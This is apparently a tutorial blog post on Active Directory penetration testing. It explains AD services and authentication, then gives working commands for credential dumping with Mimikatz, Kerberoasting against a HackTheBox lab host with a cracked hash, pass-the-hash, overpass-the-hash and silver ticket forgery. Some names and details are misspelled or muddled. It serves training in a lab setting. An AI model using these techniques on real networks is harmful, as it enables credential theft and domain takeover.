Exploiting Microsoft’s Active Directory
Introduction to Active Directory
Active Directory (AD) is a database and set of services that provide users with access to the appropriate network resources they need to get their work done.
The directory contains critical information about your environment, including a list of network resources, IAM permissions and user security roles. The AD database can contain user accounts with details like each person’s job title, phone number, and password and will link each user with the associated permissions. Initially AD was used for centralized domain management but is now an umbrella term for a broad range of Microsoft identity based services.
AD controls much of the activity that goes on in your network environment. Specifically it is responsible for authenticating users and authorizing access to specific resources on the network.
In this article we will describe the key components of Microsoft’s Active directory, describe the process of active directory hacking, and guide readers to a few key walk-throughs.
AD Services
Domain Services
Active Directory Domain Services (AD DS) is at the core of every Windows domain network. It stores information about every member including devices and users access rights. AD DS even verifies credentials. The server that is running this system is called a domain controller. A domain controller is contacted whenever a user logs into a device or accesses another device. Only one instance of AD DS can run on a Windows Server.
Lightweight Directory Services
Active Directory Light Weight Directory Services (AD LDS) is an implementation of the LDAP protocal for AD DS. AD LDS runs as a service on a Windows Server and provides the same functionality as AD DS but does not require the creation of domains or a domain controller. It provides data storage. Multiple instances of AD LDAP can run on one server.
Certificate Services
Active Directory Certificate Services (AD CS) establishes an on-premise public key infrastructure. It can create, validate and revoke public key certificates for internal use in the organization. Certificates can be used to encrypt files, emails, and network traffic.
Federation Services
Active Directory Federation Services (AD FS) is a single sign-on service. With an AD FS infrastructure in place users can access several sites after only logging in once.
Rights Management Services
Active Directory Rights Management Services (AD RMS) is a software for information rights management. It uses encryption and a form of selective functionality denial to limit access to files. Users can define file permissions and who has what level of access.
Logical Structure
Objects
In Microsoft’s Active Directory, structures are arrangements of information about objects. They fall into two two broad categories: resources (like printers) or security principals like users or computer accounts. Each object represents a single entity and all its attributes. All objects are identified by their names and a unique set of attributes and are defined by a schema. Schemas allow administrators to extend or modify an object when necessary. Once created objects can only be deactivated and not deleted.
Forest, Trees, and Domains
Objects can be viewed in a number of levels through the active directory framework. Forests, trees, and domains are logical divisions in an Active Directory network. Objects within AD deployments are grouped into domains.
Single domains are stored in a single replaceable database. Domains are defined as a group of network objects that share a single AD database.
A tree is a collection of one or more domains and domain trees in a contiguous namespace that is linked in a transitive trust hierarchy.
Forests sit at the top of a hierarchy. They are a collection of trees that share a common global catalog, directory schema, logical structure, and configuration. Forests represent security boundaries within which objects are accessible.
Overview of AD Hacking
Recently, many cyber-attacks have targeted vulnerable active directory services used in enterprise networks. Of particular interest is the “Domain controller”
In a certain sense, exploiting vulnerable AD instances is a microcosm of ethical hacking as a whole. The process involves the same key steps as a normal penetration test namely Recon or Enumeration, Gaining Access, Lateral Movement & Privilege escalation and maintaining access. Most active directory attacks begin by establishing some kind of foothold in the client system. Once in, we must escalate our privileges until we gain control of a domain (sometimes multiple).
A Note on Tools
Certain tools may be useful in exploiting AD. A non-exhaustive list of generally helpful tools is as follows:
- Powersploit
- Powermad
- Impacket
- Mimikatx
- Rubeus
- BloodHound
- Powershell Empire
Active Directory Enumeration
The first technique for enumerating AD is to list all users using the built in net user command which lists all local user accounts. Adding the /domain flag and running net user /domain will enumerate the entire domain. We can query information about specific users using this same command. For example if we ran net user admin /domain we will get information on the user admin.
At this point we can begin to list all logged in users along with their group membership, hoping to find an administrative user. Since their credentials will be cached in memory we can access them and authenticate. If we successfully steal the credentials of an administrator we can take over the whole domain. If we cannot grab the credentials of a domain admin we must do so for another user and pivot from there. The two most reliable Windows functions that can help us to achieve these goals are the NetWkstaUserEnum and NetSessionEnum. We can start by importing Powerview from C:/Tools/active_directory and call the function NetLoggedOn, without PC name PCNAME.
C:\Tools\active_directory> Import-Module .\PowerView.ps1
C:\Tools\active_directory> Get-NetLoggedon -ComputerName PCNAME
The command above will give us the name of a domain controller (DC) as well. We can run a similar command called Get-NetSession passing the same computer name flag and passing the DC name instead of PCNAME.
Active Directory Authentication
Active directory uses Kerberos or NTLM authentication protocols. NTLM is used when a client tries to authenticate to a server by IP address instead of by hostname. NTLM consists of 7 steps as follows:
- The client calculates a hash using the user’s password.
- The client sends it’s username to the application server.
- The server returns a random value called a nonce to the client.
- The client encrypts the nonce using the NTLM hash and sends it to a server known as a response.
- The server forwards the username and response to a domain controller.
- The domain controller validates the response.
- If the response is correct the domain controller approves the request.
Kerberos is different from NTLM in that it uses a ticket system. It runs in six discrete steps as follows:
- Client sends an authentication request to the domain controller.
- The domain controller replies.
- A request is sent to the DCs ticket granting service (TGS).
- The TGS replies.
- A request is sent to the application.
- The application replies.
When using Kerberos password hashes must be cached in order to renew TGT request. Obtaining these hashes allows us to crack them and gain clear text passwords. Often times we need local privileges to access password hashes and AD hacking often starts with privileges escalation.
The most popular tool for obtaining and cracking AD passwords is Mimikatz. Running the commands below allows us to dump hashes:
C:\Tools\active_directory> mimikatz.exe
mimikatz # privilege::debug
Privilege '20' OK
mimikatz # sekurlsa::logonpasswords
When targeting Kerberos we can simply extract a ticket from local memory and save it to disk.
When authenticating to a service using Kerberos you contact the Domain Controller (DC) to tell it which system service you intend to authenticate to. It encrypts a response with their services user password hash. You then send that response to the server which can decrypt it, verifys your identity and decides to let you in. In Kerboroasting, rather than sending an encrypted ticket to the DC you will use a brute forcing attack to crack the services password. We will start by using Impacket’s GetUserSPN.py script to get a list of usernames associated with the service.
root@kali:~/hackthebox/active# GetUserSPNs.py -request -dc-ip 10.10.10.100 active.htb/SVC_TGS -save -outputfile GetUserSPNs.out
Impacket v0.9.16-dev - Copyright 2002-2018 Core Security Technologies
Password:
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon
-------------------- ------------- -------------------------------------------------------- ------------------- -------------------
active/CIFS:445 Administrator CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb 2018-07-18 15:06:40 2018-07-21 11:05:53
We find the user Administrator (as seen above), as well as a ticket which we can try and brute force (saved in GetUsersSPNs.out). We will use hashcat and the rockyou wordlist to crack the hash.
root@kali:~/hackthebox/active# hashcat -m 13100 -a 0 GetUserSPNs.out /usr/share/wordlists/rockyou.txt --force
hashcat (v4.0.1) starting...
...snip...
$krb5tgs$23$*Administrator$ACTIVE.HTB$active/CIFS~445*$7028f37607953ce9fd6c9060de4aece5$55e2d21e37623a43d8cd5e36e39bfaffc52abead3887ca728d527874107ca042e0e9283ac478b1c91cab58c9
184828e7a5e0af452ad2503e463ad2088ba97964f65ac10959a3826a7f99d2d41e2a35c5a2c47392f160d65451156893242004cb6e3052854a9990bac4deb104f838f3e50eca3ba770fbed089e1c91c513b7c98149af2f9a
994655f5f13559e0acb003519ce89fa32a1dd1c8c7a24636c48a5c948317feb38abe54f875ffe259b6b25a63007798174e564f0d6a09479de92e6ed98f0887e19b1069b30e2ed8005bb8601faf4e476672865310c6a0ea0b
ea1ae10caff51715aea15a38fb2c1461310d99d6916445d7254f232e78cf9288231e436ab457929f50e6d4f70cbfcfd2251272961ff422c3928b0d702dcb31edeafd856334b64f74bbe486241d752e4cf2f6160b718b87aa
7c7161e95fab757005e5c80254a71d8615f4e89b0f4bd51575cc370e881a570f6e5b71dd14f50b8fd574a04978039e6f32d108fb4207d5540b4e58df5b8a0a9e36ec2d7fc1150bb41eb9244d96aaefb36055ebcdf435a42d
937dd86b179034754d2ac4db28a177297eaeeb86c229d0f121cf04b0ce32f63dbaa0bc5eafd47bb97c7b3a14980597a9cb2d83ce7c40e1b864c3b3a77539dd78ad41aceb950a421a707269f5ac25b27d5a6b7f334d37acc7
532451b55ded3fb46a4571ac27fc36cfad031675a85e0055d31ed154d1f273e18be7f7bc0c810f27e9e7951ccc48d976f7fa66309355422124ce6fda42f9df406563bc4c20d9005ba0ea93fac71891132113a15482f3d952
d54f22840b7a0a6000c8e8137e04a898a4fd1d87739bf5428d748086f0166b35c181729cc62b41ba6a9157333bb77c9e03dc9ac23782cf5dcebd11faad8ca3e3e74e25f21dc04ba9f1703bd51d100051c8f505cc8085056b
94e349b57906ee8deaf026b3daa89e7c3fc747a6a31ae08376da259f3118370bef86b6e7c2f88d66400eccb122dec8028223f6dcde29ffaa5b83ecb1c3780a782a5797c527a26a7b51b62db3e4865ebc2a0a0d2c931550de
cb3e7ae581b59f070dd33e423a90ec2ef66982a1b6336afe968fa93f5dd2880a313dc05d4e5cf104b6d9a8316b9fe3dc16e057e0f5c835e111ab92795fb0033541916a57df8f8e6b8cc25ecff2775282ccee110c49376c2c
ec6b7bb95c265f1466994da89e69605594ead28d24212a137ee20197d8aa95f243c347e02616f40f4071c33f749f5b94d1259fd32174:Ticketmaster1968
Active Directory Lateral Movement & Persistence
When laterally moving from account to account we look to gain access to user credentials with higher permissions. In principle we look to crack any password hashes and login to a client machine with elevated privileges. Brute forcing hashes (even if we are using rainbow tables) is notoriously difficult, can take too much time, and may fail. Moreover many AD tools like Kerberos and NTLM do not use password cracking tools directly. Three alternative methods for pwning accounts exist — namely passing the hash, overpassing the hash, and passing the ticket. We will be discussing these in further detail.
Passing the Hash
Passing the hash allows malicious users or penetration testers to authenticate into NTLM with a password hash instead of directly using clear text passwords. In principle these attacks involve connecting to SMB systems and authenticating to NTLM using the password hash. Oftentimes these tools involve python libraries and tool kits such as Impacket. These tools usually start by creating a windows service which communicates to SMB using named pipes and proceed to using NTLM legitimately. The key lies in the fact that we illegitimately obtained password hashes. Using command line tools such as pth-winexe which takes the victim IP, the username, and the password hash as inputs can automate this process for us.
Overpass the Hash
This technique relies on NTLM to gain full access to Kerbero’s TGT which has the potential to grant us access to another machine or service as any specified user. Onces logged in we can run mimikatz’s command sekurlsa::logonpasswords to dump our cached password hash. We will leverage the NTLM hash to generate a Kerberos ticket instead of authenticating using NTLM. We will first start by launching a powershell session using the following commands and substituting the capitalized variables for our own:
mimikatz# sekurlsa::pth /user:USER /domain:DOMAIN /ntlm:NTLM-HASH /run:PowerShell.exe
We will then proceed with an interactive login by running the following command:
PS C:\Windows\system32> net use \\DOMAIN-CONTROLLER-NAME
PS C:\Windows\system32> klist
The klist command requests a new ticket. We can then use the TGT to run commands through the DC and gain code execution. The command below runs powershell:
PS C:\Tools> .\PsExec.exe \\dc01 cmd.exe
Passing the ticket
Passing the Ticket exploits the Ticket Generating Serves (TGS) allows us more flexibility. The TGS can be exported and reinfected to other services. No administrative privileges are required if the ticket we capture belongs to the current user account we are utilizing.
With a clear text password or NTLM password hash at hand we can forge our own service ticket to to access any target resources. Mimikatz can craft what we call a silver ticket through the kerberos::golden command and inject it straight into memory providing us access. This process involves five commands.
We will first start by obtaining the user accounts security identifier (SID) using the following command:
C:\>whoami /user
Before creating a silver ticket we must purge all existing Kerberos tickets using the kerberos::purge command and verifying our purge with kerberos::list as follows.
mimikatz # kerberos::purge
mimikatz # kerberos::list
The silver ticket command requires a username (/user), domain name (/domain), the domain SID (/sid). We will generate the silver tickets by replacing all those variables in the areas where there are capital letters:
kerberos::golden /user:USER /domain:DOMAIN /sid:SID /target:CorpWebServer.corp.com /service:HTTP /rc4:PASSWORD-HASH /ptt
To verify that a ticket has been generated we can simply run the kerberos::list command again.
mimikatz # kerberos::list
Practicing Active Directory Hacking
“I hear and I forget. I see and I remember. I do and I understand.”
It is important to put these principals and techniques into practice. Below I have linked to very well written walk-throughs on cracking AD services. Please give it a try and let me know if you are successful. This article should give you the context for understanding these walk-throughs in greater detail and later to attempt AD hacking yourself.